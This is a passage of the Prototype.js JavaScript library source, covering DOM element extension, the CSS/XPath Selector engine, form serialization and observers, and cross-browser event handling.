onlyIfAbsent = onlyIfAbsent || false;
for (var property in methods) {
var value = methods[property];
if (!Object.isFunction(value)) continue;
if (!onlyIfAbsent || !(property in destination))
destination[property] = value.methodize();
}
}
function findDOMClass(tagName) {
var klass;
var trans = {
"OPTGROUP": "OptGroup", "TEXTAREA": "TextArea", "P": "Paragraph",
"FIELDSET": "FieldSet", "UL": "UList", "OL": "OList", "DL": "DList",
"DIR": "Directory", "H1": "Heading", "H2": "Heading", "H3": "Heading",
"H4": "Heading", "H5": "Heading", "H6": "Heading", "Q": "Quote",
"INS": "Mod", "DEL": "Mod", "A": "Anchor", "IMG": "Image", "CAPTION":
"TableCaption", "COL": "TableCol", "COLGROUP": "TableCol", "THEAD":
"TableSection", "TFOOT": "TableSection", "TBODY": "TableSection", "TR":
"TableRow", "TH": "TableCell", "TD": "TableCell", "FRAMESET":
"FrameSet", "IFRAME": "IFrame"
};
if (trans[tagName]) klass = 'HTML' + trans[tagName] + 'Element';
if (window[klass]) return window[klass];
klass = 'HTML' + tagName + 'Element';
if (window[klass]) return window[klass];
klass = 'HTML' + tagName.capitalize() + 'Element';
if (window[klass]) return window[klass];
window[klass] = { };
window[klass].prototype = document.createElement(tagName).__proto__;
return window[klass];
}
if (F.ElementExtensions) {
copy(Element.Methods, HTMLElement.prototype);
copy(Element.Methods.Simulated, HTMLElement.prototype, true);
}
if (F.SpecificElementExtensions) {
for (var tag in Element.Methods.ByTag) {
var klass = findDOMClass(tag);
if (Object.isUndefined(klass)) continue;
copy(T[tag], klass.prototype);
}
}
Object.extend(Element, Element.Methods);
delete Element.ByTag;
if (Element.extend.refresh) Element.extend.refresh();
Element.cache = { };
};
document.viewport = {
getDimensions: function() {
var dimensions = { };
$w('width height').each(function(d) {
var D = d.capitalize();
dimensions[d] = self['inner' + D] ||
(document.documentElement['client' + D] || document.body['client' + D]);
});
return dimensions;
},
getWidth: function() {
return this.getDimensions().width;
},
getHeight: function() {
return this.getDimensions().height;
},
getScrollOffsets: function() {
return Element._returnOffset(
window.pageXOffset || document.documentElement.scrollLeft || document.body.scrollLeft,
window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop);
}
};
/* Portions of the Selector class are derived from Jack Slocum’s DomQuery,
* part of YUI-Ext version 0.40, distributed under the terms of an MIT-style
* license. Please see http://www.yui-ext.com/ for more information. */
var Selector = Class.create({
initialize: function(expression) {
this.expression = expression.strip();
this.compileMatcher();
},
compileMatcher: function() {
// Selectors with namespaced attributes can't use the XPath version
if (Prototype.BrowserFeatures.XPath && !(/(\[[\w-]*?:|:checked)/).test(this.expression))
return this.compileXPathMatcher();
var e = this.expression, ps = Selector.patterns, h = Selector.handlers,
c = Selector.criteria, le, p, m;
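// reuse a previously compiled matcher function for this expression, if cached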
if (Selector._cache[e]) {
this.matcher = Selector._cache[e];
return;
}
this.matcher = ["this.matcher = function(root) {",
"var r = root, h = Selector.handlers, c = false, n;"];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
p = ps[i];
if (m = e.match(p)) {
this.matcher.push(Object.isFunction(c[i]) ? c[i](m) :
new Template(c[i]).evaluate(m));
e = e.replace(m[0], '');
break;
}
}
}
this.matcher.push("return h.unique(n);\n}");
eval(this.matcher.join('\n'));
Selector._cache[this.expression] = this.matcher;
},
compileXPathMatcher: function() {
var e = this.expression, ps = Selector.patterns,
x = Selector.xpath, le, m;
if (Selector._cache[e]) {
this.xpath = Selector._cache[e]; return;
}
this.matcher = ['.//*'];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
if (m = e.match(ps[i])) {
this.matcher.push(Object.isFunction(x[i]) ? x[i](m) :
new Template(x[i]).evaluate(m));
e = e.replace(m[0], '');
break;
}
}
}
this.xpath = this.matcher.join('');
Selector._cache[this.expression] = this.xpath;
},
findElements: function(root) {
root = root || document;
if (this.xpath) return document._getElementsByXPath(this.xpath, root);
return this.matcher(root);
},
match: function(element) {
this.tokens = [];
var e = this.expression, ps = Selector.patterns, as = Selector.assertions;
var le, p, m;
while (e && le !== e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
p = ps[i];
if (m = e.match(p)) {
// use the Selector.assertions methods unless the selector
// is too complex.
if (as[i]) {
this.tokens.push([i, Object.clone(m)]);
e = e.replace(m[0], '');
} else {
// reluctantly do a document-wide search
// and look for a match in the array
return this.findElements(document).include(element);
}
}
}
}
var match = true, name, matches;
for (var i = 0, token; token = this.tokens[i]; i++) {
name = token[0], matches = token[1];
if (!Selector.assertions[name](element, matches)) {
match = false; break;
}
}
return match;
},
toString: function() {
return this.expression;
},
inspect: function() {
return "#<Selector:" + this.expression.inspect() + ">";
}
});
Object.extend(Selector, {
_cache: { },
xpath: {
descendant: "//*",
child: "/*",
adjacent: "/following-sibling::*[1]",
laterSibling: '/following-sibling::*',
tagName: function(m) {
if (m[1] == '*') return '';
return "[local-name()='" + m[1].toLowerCase() +
"' or local-name()='" + m[1].toUpperCase() + "']";
},
className: "[contains(concat(' ', @class, ' '), ' #{1} ')]",
id: "[@id='#{1}']",
attrPresence: "[@#{1}]",
attr: function(m) {
m[3] = m[5] || m[6];
return new Template(Selector.xpath.operators[m[2]]).evaluate(m);
},
pseudo: function(m) {
var h = Selector.xpath.pseudos[m[1]];
if (!h) return '';
if (Object.isFunction(h)) return h(m);
return new Template(Selector.xpath.pseudos[m[1]]).evaluate(m);
},
operators: {
'=': "[@#{1}='#{3}']",
'!=': "[@#{1}!='#{3}']",
'^=': "[starts-with(@#{1}, '#{3}')]",
'$=': "[substring(@#{1}, (string-length(@#{1}) - string-length('#{3}') + 1))='#{3}']",
'*=': "[contains(@#{1}, '#{3}')]",
'~=': "[contains(concat(' ', @#{1}, ' '), ' #{3} ')]",
'|=': "[contains(concat('-', @#{1}, '-'), '-#{3}-')]"
},
pseudos: {
'first-child': '[not(preceding-sibling::*)]',
'last-child': '[not(following-sibling::*)]',
'only-child': '[not(preceding-sibling::* or following-sibling::*)]',
'empty': "[count(*) = 0 and (count(text()) = 0 or translate(text(), ' \t\r\n', '') = '')]",
'checked': "[@checked]",
'disabled': "[@disabled]",
'enabled': "[not(@disabled)]",
'not': function(m) {
var e = m[6], p = Selector.patterns,
x = Selector.xpath, le, m, v;
var exclusion = [];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in p) {
if (m = e.match(p[i])) {
v = Object.isFunction(x[i]) ? x[i](m) : new Template(x[i]).evaluate(m);
exclusion.push("(" + v.substring(1, v.length - 1) + ")");
e = e.replace(m[0], '');
break;
}
}
}
return "[not(" + exclusion.join(" and ") + ")]";
},
'nth-child': function(m) {
return Selector.xpath.pseudos.nth("(count(./preceding-sibling::*) + 1) ", m);
},
'nth-last-child': function(m) {
return Selector.xpath.pseudos.nth("(count(./following-sibling::*) + 1) ", m);
},
'nth-of-type': function(m) {
return Selector.xpath.pseudos.nth("position() ", m);
},
'nth-last-of-type': function(m) {
return Selector.xpath.pseudos.nth("(last() + 1 - position()) ", m);
},
'first-of-type': function(m) {
m[6] = "1"; return Selector.xpath.pseudos['nth-of-type'](m);
},
'last-of-type': function(m) {
m[6] = "1"; return Selector.xpath.pseudos['nth-last-of-type'](m);
},
'only-of-type': function(m) {
var p = Selector.xpath.pseudos; return p['first-of-type'](m) + p['last-of-type'](m);
},
nth: function(fragment, m) {
var mm, formula = m[6], predicate;
if (formula == 'even') formula = '2n+0';
if (formula == 'odd') formula = '2n+1';
if (mm = formula.match(/^(\d+)$/)) // digit only
return '[' + fragment + "= " + mm[1] + ']';
if (mm = formula.match(/^(-?\d*)?n(([+-])(\d+))?/)) { // an+b
if (mm[1] == "-") mm[1] = -1;
var a = mm[1] ? Number(mm[1]) : 1;
var b = mm[2] ? Number(mm[2]) : 0;
predicate = "[((#{fragment} - #{b}) mod #{a} = 0) and " +
"((#{fragment} - #{b}) div #{a} >= 0)]";
return new Template(predicate).evaluate({
fragment: fragment, a: a, b: b });
}
}
}
},
criteria: {
tagName: 'n = h.tagName(n, r, "#{1}", c); c = false;',
className: 'n = h.className(n, r, "#{1}", c); c = false;',
id: 'n = h.id(n, r, "#{1}", c); c = false;',
attrPresence: 'n = h.attrPresence(n, r, "#{1}"); c = false;',
attr: function(m) {
m[3] = (m[5] || m[6]);
return new Template('n = h.attr(n, r, "#{1}", "#{3}", "#{2}"); c = false;').evaluate(m);
},
pseudo: function(m) {
if (m[6]) m[6] = m[6].replace(/"/g, '\\"');
return new Template('n = h.pseudo(n, "#{1}", "#{6}", r, c); c = false;').evaluate(m);
},
descendant: 'c = "descendant";',
child: 'c = "child";',
adjacent: 'c = "adjacent";',
laterSibling: 'c = "laterSibling";'
},
patterns: {
// combinators must be listed first
// (and descendant needs to be last combinator)
laterSibling: /^\s*~\s*/,
child: /^\s*>\s*/,
adjacent: /^\s*\+\s*/,
descendant: /^\s/,
// selectors follow
tagName: /^\s*(\*|[\w\-]+)(\b|$)?/,
id: /^#([\w\-\*]+)(\b|$)/,
className: /^\.([\w\-\*]+)(\b|$)/,
pseudo: /^:((first|last|nth|nth-last|only)(-child|-of-type)|empty|checked|(en|dis)abled|not)(\((.*?)\))?(\b|$|(?=\s)|(?=:))/,
attrPresence: /^\[([\w]+)\]/,
attr: /\[((?:[\w-]*:)?[\w-]+)\s*(?:([!^$*~|]?=)\s*((['"])([^\4]*?)\4|([^'"][^\]]*?)))?\]/
},
// for Selector.match and Element#match
assertions: {
tagName: function(element, matches) {
return matches[1].toUpperCase() == element.tagName.toUpperCase();
},
className: function(element, matches) {
return Element.hasClassName(element, matches[1]);
},
id: function(element, matches) {
return element.id === matches[1];
},
attrPresence: function(element, matches) {
return Element.hasAttribute(element, matches[1]);
},
attr: function(element, matches) {
var nodeValue = Element.readAttribute(element, matches[1]);
return Selector.operators[matches[2]](nodeValue, matches[3]);
}
},
handlers: {
// UTILITY FUNCTIONS
// joins two collections
concat: function(a, b) {
for (var i = 0, node; node = b[i]; i++)
a.push(node);
return a;
},
// marks an array of nodes for counting
mark: function(nodes) {
for (var i = 0, node; node = nodes[i]; i++)
node._counted = true;
return nodes;
},
unmark: function(nodes) {
for (var i = 0, node; node = nodes[i]; i++)
node._counted = undefined;
return nodes;
},
// mark each child node with its position (for nth calls)
// "ofType" flag indicates whether we're indexing for nth-of-type
// rather than nth-child
index: function(parentNode, reverse, ofType) {
parentNode._counted = true;
if (reverse) {
for (var nodes = parentNode.childNodes, i = nodes.length - 1, j = 1; i >= 0; i--) {
var node = nodes[i];
if (node.nodeType == 1 && (!ofType || node._counted)) node.nodeIndex = j++;
}
} else {
for (var i = 0, j = 1, nodes = parentNode.childNodes; node = nodes[i]; i++)
if (node.nodeType == 1 && (!ofType || node._counted)) node.nodeIndex = j++;
}
},
// filters out duplicates and extends all nodes
unique: function(nodes) {
if (nodes.length == 0) return nodes;
var results = [], n;
for (var i = 0, l = nodes.length; i < l; i++)
if (!(n = nodes[i])._counted) {
n._counted = true;
results.push(Element.extend(n));
}
return Selector.handlers.unmark(results);
},
// COMBINATOR FUNCTIONS
descendant: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
h.concat(results, node.getElementsByTagName('*'));
return results;
},
child: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++) {
for (var j = 0, children = [], child; child = node.childNodes[j]; j++)
if (child.nodeType == 1 && child.tagName != '!') results.push(child);
}
return results;
},
adjacent: function(nodes) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
var next = this.nextElementSibling(node);
if (next) results.push(next);
}
return results;
},
laterSibling: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
h.concat(results, Element.nextSiblings(node));
return results;
},
nextElementSibling: function(node) {
while (node = node.nextSibling)
if (node.nodeType == 1) return node;
return null;
},
previousElementSibling: function(node) {
while (node = node.previousSibling)
if (node.nodeType == 1) return node;
return null;
},
// TOKEN FUNCTIONS
tagName: function(nodes, root, tagName, combinator) {
tagName = tagName.toUpperCase();
var results = [], h = Selector.handlers;
if (nodes) {
if (combinator) {
// fastlane for ordinary descendant combinators
if (combinator == "descendant") {
for (var i = 0, node; node = nodes[i]; i++)
h.concat(results, node.getElementsByTagName(tagName));
return results;
} else nodes = this[combinator](nodes);
if (tagName == "*") return nodes;
}
for (var i = 0, node; node = nodes[i]; i++)
if (node.tagName.toUpperCase() == tagName) results.push(node);
return results;
} else return root.getElementsByTagName(tagName);
},
id: function(nodes, root, id, combinator) {
var targetNode = $(id), h = Selector.handlers;
if (!targetNode) return [];
if (!nodes && root == document) return [targetNode];
if (nodes) {
if (combinator) {
if (combinator == 'child') {
for (var i = 0, node; node = nodes[i]; i++)
if (targetNode.parentNode == node) return [targetNode];
} else if (combinator == 'descendant') {
for (var i = 0, node; node = nodes[i]; i++)
if (Element.descendantOf(targetNode, node)) return [targetNode];
} else if (combinator == 'adjacent') {
for (var i = 0, node; node = nodes[i]; i++)
if (Selector.handlers.previousElementSibling(targetNode) == node)
return [targetNode];
} else nodes = h[combinator](nodes);
}
for (var i = 0, node; node = nodes[i]; i++)
if (node == targetNode) return [targetNode];
return [];
}
return (targetNode && Element.descendantOf(targetNode, root)) ? [targetNode] : [];
},
className: function(nodes, root, className, combinator) {
if (nodes && combinator) nodes = this[combinator](nodes);
return Selector.handlers.byClassName(nodes, root, className);
},
byClassName: function(nodes, root, className) {
if (!nodes) nodes = Selector.handlers.descendant([root]);
var needle = ' ' + className + ' ';
for (var i = 0, results = [], node, nodeClassName; node = nodes[i]; i++) {
nodeClassName = node.className;
if (nodeClassName.length == 0) continue;
if (nodeClassName == className || (' ' + nodeClassName + ' ').include(needle))
results.push(node);
}
return results;
},
attrPresence: function(nodes, root, attr) {
if (!nodes) nodes = root.getElementsByTagName("*");
var results = [];
for (var i = 0, node; node = nodes[i]; i++)
if (Element.hasAttribute(node, attr)) results.push(node);
return results;
},
attr: function(nodes, root, attr, value, operator) {
if (!nodes) nodes = root.getElementsByTagName("*");
var handler = Selector.operators[operator], results = [];
for (var i = 0, node; node = nodes[i]; i++) {
var nodeValue = Element.readAttribute(node, attr);
if (nodeValue === null) continue;
if (handler(nodeValue, value)) results.push(node);
}
return results;
},
pseudo: function(nodes, name, value, root, combinator) {
if (nodes && combinator) nodes = this[combinator](nodes);
if (!nodes) nodes = root.getElementsByTagName("*");
return Selector.pseudos[name](nodes, value, root);
}
},
pseudos: {
'first-child': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
if (Selector.handlers.previousElementSibling(node)) continue;
results.push(node);
}
return results;
},
'last-child': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
if (Selector.handlers.nextElementSibling(node)) continue;
results.push(node);
}
return results;
},
'only-child': function(nodes, value, root) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!h.previousElementSibling(node) && !h.nextElementSibling(node))
results.push(node);
return results;
},
'nth-child': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root);
},
'nth-last-child': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, true);
},
'nth-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, false, true);
},
'nth-last-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, true, true);
},
'first-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, "1", root, false, true);
},
'last-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, "1", root, true, true);
},
'only-of-type': function(nodes, formula, root) {
var p = Selector.pseudos;
return p['last-of-type'](p['first-of-type'](nodes, formula, root), formula, root);
},
// handles the an+b logic
getIndices: function(a, b, total) {
if (a == 0) return b > 0 ? [b] : [];
return $R(1, total).inject([], function(memo, i) {
if (0 == (i - b) % a && (i - b) / a >= 0) memo.push(i);
return memo;
});
},
// handles nth(-last)-child, nth(-last)-of-type, and (first|last)-of-type
nth: function(nodes, formula, root, reverse, ofType) {
if (nodes.length == 0) return [];
if (formula == 'even') formula = '2n+0';
if (formula == 'odd') formula = '2n+1';
var h = Selector.handlers, results = [], indexed = [], m;
h.mark(nodes);
for (var i = 0, node; node = nodes[i]; i++) {
if (!node.parentNode._counted) {
h.index(node.parentNode, reverse, ofType);
indexed.push(node.parentNode);
}
}
if (formula.match(/^\d+$/)) { // just a number
formula = Number(formula);
for (var i = 0, node; node = nodes[i]; i++)
if (node.nodeIndex == formula) results.push(node);
} else if (m = formula.match(/^(-?\d*)?n(([+-])(\d+))?/)) { // an+b
if (m[1] == "-") m[1] = -1;
var a = m[1] ? Number(m[1]) : 1;
var b = m[2] ? Number(m[2]) : 0;
var indices = Selector.pseudos.getIndices(a, b, nodes.length);
for (var i = 0, node, l = indices.length; node = nodes[i]; i++) {
for (var j = 0; j < l; j++)
if (node.nodeIndex == indices[j]) results.push(node);
}
}
h.unmark(nodes);
h.unmark(indexed);
return results;
},
'empty': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
// IE treats comments as element nodes
if (node.tagName == '!' || (node.firstChild && !node.innerHTML.match(/^\s*$/))) continue;
results.push(node);
}
return results;
},
'not': function(nodes, selector, root) {
var h = Selector.handlers, selectorType, m;
var exclusions = new Selector(selector).findElements(root);
h.mark(exclusions);
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!node._counted) results.push(node);
h.unmark(exclusions);
return results;
},
'enabled': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!node.disabled) results.push(node);
return results;
},
'disabled': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (node.disabled) results.push(node);
return results;
},
'checked': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (node.checked) results.push(node);
return results;
}
},
operators: {
'=': function(nv, v) { return nv == v; },
'!=': function(nv, v) { return nv != v; },
'^=': function(nv, v) { return nv.startsWith(v); },
'$=': function(nv, v) { return nv.endsWith(v); },
'*=': function(nv, v) { return nv.include(v); },
'~=': function(nv, v) { return (' ' + nv + ' ').include(' ' + v + ' '); },
'|=': function(nv, v) { return ('-' + nv.toUpperCase() + '-').include('-' + v.toUpperCase() + '-'); }
},
matchElements: function(elements, expression) {
var matches = new Selector(expression).findElements(), h = Selector.handlers;
h.mark(matches);
for (var i = 0, results = [], element; element = elements[i]; i++)
if (element._counted) results.push(element);
h.unmark(matches);
return results;
},
findElement: function(elements, expression, index) {
if (Object.isNumber(expression)) {
index = expression; expression = false;
}
return Selector.matchElements(elements, expression || '*')[index || 0];
},
findChildElements: function(element, expressions) {
var exprs = expressions.join(','), expressions = [];
exprs.scan(/(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/, function(m) {
expressions.push(m[1].strip());
});
var results = [], h = Selector.handlers;
for (var i = 0, l = expressions.length, selector; i < l; i++) {
selector = new Selector(expressions[i].strip());
h.concat(results, selector.findElements(element));
}
return (l > 1) ? h.unique(results) : results;
}
});
function $$() {
return Selector.findChildElements(document, $A(arguments));
}
var Form = {
reset: function(form) {
$(form).reset();
return form;
},
serializeElements: function(elements, options) {
if (typeof options != 'object') options = { hash: !!options };
else if (options.hash === undefined) options.hash = true;
var key, value, submitted = false, submit = options.submit;
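// at most one submit button is serialized: the first one encountered, unless
// options.submit names a specific button or is false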
var data = elements.inject({ }, function(result, element) {
if (!element.disabled && element.name) {
key = element.name; value = $(element).getValue();
if (value != null && (element.type != 'submit' || (!submitted &&
submit !== false && (!submit || key == submit) && (submitted = true)))) {
if (key in result) {
// a key is already present; construct an array of values
if (!Object.isArray(result[key])) result[key] = [result[key]];
result[key].push(value);
}
else result[key] = value;
}
}
return result;
});
return options.hash ? data : Object.toQueryString(data);
}
};
Form.Methods = {
serialize: function(form, options) {
return Form.serializeElements(Form.getElements(form), options);
},
getElements: function(form) {
return $A($(form).getElementsByTagName('*')).inject([],
function(elements, child) {
if (Form.Element.Serializers[child.tagName.toLowerCase()])
elements.push(Element.extend(child));
return elements;
}
);
},
getInputs: function(form, typeName, name) {
form = $(form);
var inputs = form.getElementsByTagName('input');
if (!typeName && !name) return $A(inputs).map(Element.extend);
for (var i = 0, matchingInputs = [], length = inputs.length; i < length; i++) {
var input = inputs[i];
if ((typeName && input.type != typeName) || (name && input.name != name))
continue;
matchingInputs.push(Element.extend(input));
}
return matchingInputs;
},
disable: function(form) {
form = $(form);
Form.getElements(form).invoke('disable');
return form;
},
enable: function(form) {
form = $(form);
Form.getElements(form).invoke('enable');
return form;
},
findFirstElement: function(form) {
var elements = $(form).getElements().findAll(function(element) {
return 'hidden' != element.type && !element.disabled;
});
var firstByIndex = elements.findAll(function(element) {
return element.hasAttribute('tabIndex') && element.tabIndex >= 0;
}).sortBy(function(element) { return element.tabIndex }).first();
return firstByIndex ? firstByIndex : elements.find(function(element) {
return ['input', 'select', 'textarea'].include(element.tagName.toLowerCase());
});
},
focusFirstElement: function(form) {
form = $(form);
form.findFirstElement().activate();
return form;
},
request: function(form, options) {
form = $(form), options = Object.clone(options || { });
var params = options.parameters, action = form.readAttribute('action') || '';
if (action.blank()) action = window.location.href;
options.parameters = form.serialize(true);
if (params) {
if (Object.isString(params)) params = params.toQueryParams();
Object.extend(options.parameters, params);
}
if (form.hasAttribute('method') && !options.method)
options.method = form.method;
return new Ajax.Request(action, options);
}
};
/*--------------------------------------------------------------------------*/
Form.Element = {
focus: function(element) {
$(element).focus();
return element;
},
select: function(element) {
$(element).select();
return element;
}
};
Form.Element.Methods = {
serialize: function(element) {
element = $(element);
if (!element.disabled && element.name) {
var value = element.getValue();
if (value != undefined) {
var pair = { };
pair[element.name] = value;
return Object.toQueryString(pair);
}
}
return '';
},
getValue: function(element) {
element = $(element);
var method = element.tagName.toLowerCase();
return Form.Element.Serializers[method](element);
},
setValue: function(element, value) {
element = $(element);
var method = element.tagName.toLowerCase();
Form.Element.Serializers[method](element, value);
return element;
},
clear: function(element) {
$(element).value = '';
return element;
},
present: function(element) {
return $(element).value != '';
},
activate: function(element) {
element = $(element);
try {
element.focus();
if (element.select && (element.tagName.toLowerCase() != 'input' ||
!['button', 'reset', 'submit'].include(element.type)))
element.select();
} catch (e) { }
return element;
},
disable: function(element) {
element = $(element);
element.blur();
element.disabled = true;
return element;
},
enable: function(element) {
element = $(element);
element.disabled = false;
return element;
}
};
/*--------------------------------------------------------------------------*/
var Field = Form.Element;
var $F = Form.Element.Methods.getValue;
/*--------------------------------------------------------------------------*/
Form.Element.Serializers = {
input: function(element, value) {
switch (element.type.toLowerCase()) {
case 'checkbox':
case 'radio':
return Form.Element.Serializers.inputSelector(element, value);
default:
return Form.Element.Serializers.textarea(element, value);
}
},
inputSelector: function(element, value) {
if (value === undefined) return element.checked ? element.value : null;
else element.checked = !!value;
},
textarea: function(element, value) {
if (value === undefined) return element.value;
else element.value = value;
},
select: function(element, index) {
if (index === undefined)
return this[element.type == 'select-one' ?
'selectOne' : 'selectMany'](element);
else {
var opt, value, single = !Object.isArray(index);
for (var i = 0, length = element.length; i < length; i++) {
opt = element.options[i];
value = this.optionValue(opt);
if (single) {
if (value == index) {
opt.selected = true;
return;
}
}
else opt.selected = index.include(value);
}
}
},
selectOne: function(element) {
var index = element.selectedIndex;
return index >= 0 ? this.optionValue(element.options[index]) : null;
},
selectMany: function(element) {
var values, length = element.length;
if (!length) return null;
for (var i = 0, values = []; i < length; i++) {
var opt = element.options[i];
if (opt.selected) values.push(this.optionValue(opt));
}
return values;
},
optionValue: function(opt) {
// extend element because hasAttribute may not be native
return Element.extend(opt).hasAttribute('value') ? opt.value : opt.text;
}
};
/*--------------------------------------------------------------------------*/
Abstract.TimedObserver = Class.create(PeriodicalExecuter, {
initialize: function($super, element, frequency, callback) {
$super(callback, frequency);
this.element = $(element);
this.lastValue = this.getValue();
},
execute: function() {
var value = this.getValue();
if (Object.isString(this.lastValue) && Object.isString(value) ?
this.lastValue != value : String(this.lastValue) != String(value)) {
this.callback(this.element, value);
this.lastValue = value;
}
}
});
Form.Element.Observer = Class.create(Abstract.TimedObserver, {
getValue: function() {
return Form.Element.getValue(this.element);
}
});
Form.Observer = Class.create(Abstract.TimedObserver, {
getValue: function() {
return Form.serialize(this.element);
}
});
/*--------------------------------------------------------------------------*/
Abstract.EventObserver = Class.create({
initialize: function(element, callback) {
this.element = $(element);
this.callback = callback;
this.lastValue = this.getValue();
if (this.element.tagName.toLowerCase() == 'form')
this.registerFormCallbacks();
else
this.registerCallback(this.element);
},
onElementEvent: function() {
var value = this.getValue();
if (this.lastValue != value) {
this.callback(this.element, value);
this.lastValue = value;
}
},
registerFormCallbacks: function() {
Form.getElements(this.element).each(this.registerCallback, this);
},
registerCallback: function(element) {
if (element.type) {
switch (element.type.toLowerCase()) {
case 'checkbox':
case 'radio':
Event.observe(element, 'click', this.onElementEvent.bind(this));
break;
default:
Event.observe(element, 'change', this.onElementEvent.bind(this));
break;
}
}
}
});
Form.Element.EventObserver = Class.create(Abstract.EventObserver, {
getValue: function() {
return Form.Element.getValue(this.element);
}
});
Form.EventObserver = Class.create(Abstract.EventObserver, {
getValue: function() {
return Form.serialize(this.element);
}
});
if (!window.Event) var Event = { };
Object.extend(Event, {
KEY_BACKSPACE: 8,
KEY_TAB: 9,
KEY_RETURN: 13,
KEY_ESC: 27,
KEY_LEFT: 37,
KEY_UP: 38,
KEY_RIGHT: 39,
KEY_DOWN: 40,
KEY_DELETE: 46,
KEY_HOME: 36,
KEY_END: 35,
KEY_PAGEUP: 33,
KEY_PAGEDOWN: 34,
KEY_INSERT: 45,
cache: { },
relatedTarget: function(event) {
var element;
switch(event.type) {
case 'mouseover': element = event.fromElement; break;
case 'mouseout': element = event.toElement; break;
default: return null;
}
return Element.extend(element);
}
});
Event.Methods = (function() {
var isButton;
if (Prototype.Browser.IE) {
var buttonMap = { 0: 1, 1: 4, 2: 2 };
isButton = function(event, code) {
return event.button == buttonMap[code];
};
} else if (Prototype.Browser.WebKit) {
isButton = function(event, code) {
switch (code) {
case 0: return event.which == 1 && !event.metaKey;
case 1: return event.which == 1 && event.metaKey;
default: return false;
}
};
} else {
isButton = function(event, code) {
return event.which ? (event.which === code + 1) : (event.button === code);
};
}
return {
isLeftClick: function(event) { return isButton(event, 0) },
isMiddleClick: function(event) { return isButton(event, 1) },
isRightClick: function(event) { return isButton(event, 2) },
element: function(event) {
var node = Event.extend(event).target;
return Element.extend(node.nodeType == Node.TEXT_NODE ? node.parentNode : node);
},
findElement: function(event, expression) {
var element = Event.element(event);
return element.match(expression) ? element : element.up(expression);
},
pointer: function(event) {
return {
x: event.pageX || (event.clientX +
(document.documentElement.scrollLeft || document.body.scrollLeft)),
y: event.pageY || (event.clientY +
(document.documentElement.scrollTop || document.body.scrollTop))
};
},
pointerX: function(event) { return Event.pointer(event).x },
pointerY: function(event) { return Event.pointer(event).y },
stop: function(event) {
Event.extend(event);
event.preventDefault();
event.stopPropagation();
event.stopped = true;
}
};
})();
Event.extend = (function() {
var methods = Object.keys(Event.Methods).inject({ }, function(m, name) {
m[name] = Event.Methods[name].methodize();
return m;
});
if (Prototype.Browser.IE) {
Object.extend(methods, {
stopPropagation: function() { this.cancelBubble = true },
preventDefault: function() { this.returnValue = false },
inspect: function() { return "[object Event]" }
});
return function(event) {
if (!event) return false;
if (event._extendedByPrototype) return event;
event._extendedByPrototype = Prototype.emptyFunction;
var pointer = Event.pointer(event);
Object.extend(event, {
target: event.srcElement,
relatedTarget: Event.relatedTarget(event),
pageX: pointer.x,
pageY: pointer.y
});
return Object.extend(event, methods);
};
} else {
Event.prototype = Event.prototype || document.createEvent("HTMLEvents").__proto__;
Object.extend(Event.prototype, methods);
return Prototype.K;
}
})();
Object.extend(Event, (function() {
var cache = Event.cache;
function getEventID(element) {
if (element._eventID) return element._eventID;
arguments.callee.id = arguments.callee.id || 1;
return element._eventID = ++arguments.callee.id;
}
function getDOMEventName(eventName) {
if (eventName && eventName.include(':')) return "dataavailable";
return eventName;
}
function getCacheForID(id) {
return cache[id] = cache[id] || { };
}
function getWrappersForEventName(id, eventName) {
var c = getCacheForID(id);
return c[eventName] = c[eventName] || [];
}
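// wraps a handler so it only fires for the registered (possibly custom) event name
// and receives an extended event object; wrappers are cached so stopObserving can find them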
function createWrapper(element, eventName, handler) {
var id = getEventID(element);
var c = getWrappersForEventName(id, eventName);
if (c.pluck("handler").include(handler)) return false;
var wrapper = function(event) {
if (!Event || !Event.extend ||
(event.eventName && event.eventName != eventName))
return false;
Event.extend(event);
handler.call(element, event)
};
wrapper.handler = handler;
c.push(wrapper);
return wrapper;
}
function findWrapper(id, eventName, handler) {
var c = getWrappersForEventName(id, eventName);
return c.find(function(wrapper) { return wrapper.handler == handler });
}
function destroyWrapper(id, eventName, handler) {
var c = getCacheForID(id);
if (!c[eventName]) return false;
c[eventName] = c[eventName].without(findWrapper(id, eventName, handler));
}
function destroyCache() {
for (var id in cache)
for (var eventName in cache[id])
cache[id][eventName] = null;
}
if (window.attachEvent) {
window.attachEvent("onunload", destroyCache);
}
return {
observe: function(element, eventName, handler) {
element = $(element);
var name = getDOMEventName(eventName);
var wrapper = createWrapper(element, eventName, handler);
if (!wrapper) return element;
if (element.addEventListener) {
element.addEventListener(name, wrapper, false);
} else {
element.attachEvent("on" + name, wrapper);
}
return element;
},
stopObserving: function(element, eventName, handler) {
element = $(element);
var id = getEventID(element), name = getDOMEventName(eventName);
if (!handler && eventName) {
getWrappersForEventName(id, eventName).each(function(wrapper) {
element.stopObserving(eventName, wrapper.handler);
});
return element;
} else if (!eventName) {
Object.keys(getCacheForID(id)).each(function(eventName) {
element.stopObserving(eventName);
});
return element;
}
var wrapper = findWrapper(id, eventName, handler);
if (!wrapper) return element;
